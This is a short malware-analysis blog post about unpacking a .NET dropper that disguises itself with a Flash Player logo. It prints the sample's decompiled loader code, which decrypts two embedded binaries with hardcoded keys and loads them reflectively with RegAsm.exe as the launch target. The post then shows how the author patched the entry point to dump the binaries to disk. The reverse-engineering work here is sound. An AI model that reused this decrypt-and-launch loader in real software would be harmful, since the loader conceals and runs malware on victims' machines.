I was browsing through Malware Bazaar and came across a Win32 Binary that hadn’t been tagged with anything specific, which piqued my interest it it
Grabbing the sample revealed a binary with a flash player logo, and detect it easy identified it as a .net binary.
I discovered a few interesting things by dropping the binary into DnSpy. The binary was a wrapped for 2 encrypted binaries bundled in the app’s resources, CLS.dll
and Xola.exe
The app itself was just a really simple SymmetricAlgorithm
decrypter that launches the decrypted binaries in a new thread
// Consol.Program // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 private static void Main() { Thread.GetDomain().Load(hpCGGsxnBfkpZyTC.jjjjjj).GetType(hpCGGsxnBfkpZyTC.tttttt).GetMethod(hpCGGsxnBfkpZyTC.kkkk).Invoke(null, new object[] { hpCGGsxnBfkpZyTC.locationstart, hpCGGsxnBfkpZyTC.lastcode }); }
using System; using System.IO; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; using Consol; using Microsoft.VisualBasic.CompilerServices; // Token: 0x02000003 RID: 3 public static class hpCGGsxnBfkpZyTC { // Token: 0x06000003 RID: 3 RVA: 0x000020A8 File Offset: 0x000002A8 public static byte[] syam(byte[] B, string ikey) { SymmetricAlgorithm symmetricAlgorithm = SymmetricAlgorithm.Create(); SHA256CryptoServiceProvider sha256CryptoServiceProvider = new SHA256CryptoServiceProvider(); byte[] key = sha256CryptoServiceProvider.ComputeHash(Encoding.BigEndianUnicode.GetBytes(ikey)); symmetricAlgorithm.Key = key; symmetricAlgorithm.Mode = CipherMode.ECB; return symmetricAlgorithm.CreateDecryptor().TransformFinalBlock(B, 0, B.Length); } // Token: 0x06000004 RID: 4 RVA: 0x000020F4 File Offset: 0x000002F4 public static byte[] ExtractResource(string filename) { byte[] result; using (Stream manifestResourceStream = typeof(Program).Assembly.GetManifestResourceStream(filename)) { if (manifestResourceStream == null) { result = null; } else { byte[] array = new byte[manifestResourceStream.Length]; manifestResourceStream.Read(array, 0, array.Length); result = array; } } return result; } // Token: 0x04000001 RID: 1 public static string locationstart = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"); // Token: 0x04000002 RID: 2 public static byte[] lastcode = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("Xola.exe"), "ZiZ"); // Token: 0x04000003 RID: 3 public static byte[] jjjjjj = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("CLS.dll"), "جc吉尺O"); // Token: 0x04000004 RID: 4 public static string tttttt = Conversions.ToString("AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOnTpCiTDfBnyfynAAJxwhxnBJTLsQ.vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph"); // Token: 0x04000005 RID: 5 public static string kkkk = "yhxGkJfDMpTfiUkihOywMGfEhwUUQLLMnQOsEBvpnBEZUkExQhTyUQhJwkMJAisikT"; }
To keep things super simple and easy, I’m going to modify the hpCGGsxnBfkpZyTC
class to include a dump()
function that will simply write the 2 binaries to the disk
public static void dump(string fileName, byte[] bytes) { File.WriteAllBytes("C:\\Temp\\" + fileName, bytes); }
Then modify the entry point to dump the binaries instead of running them
using System; namespace Consol { // Token: 0x02000002 RID: 2 internal class Program { // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 private static void Main() { hpCGGsxnBfkpZyTC.dump("CLS.dll", hpCGGsxnBfkpZyTC.jjjjjj); hpCGGsxnBfkpZyTC.dump("Xola.exe", hpCGGsxnBfkpZyTC.lastcode); } } }
The result? 2 freshly decrypted malware samples in C:\Temp
I’ll dig into the 2 binaries in a part 2 sometime, but for now I’ll leave it there 🙂
References
https://bazaar.abuse.ch/sample/af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66/ CLS.dll - https://www.virustotal.com/gui/file/5026b4d5a20d9bd7f07f111adbfdcdffa3423e83a1f5a982c1c34ad610eaa678/details Xola.exe - https://www.virustotal.com/gui/file/f5e53da9273368bd53d088d573088865f80a318e9839a54214584c3eb98de003/details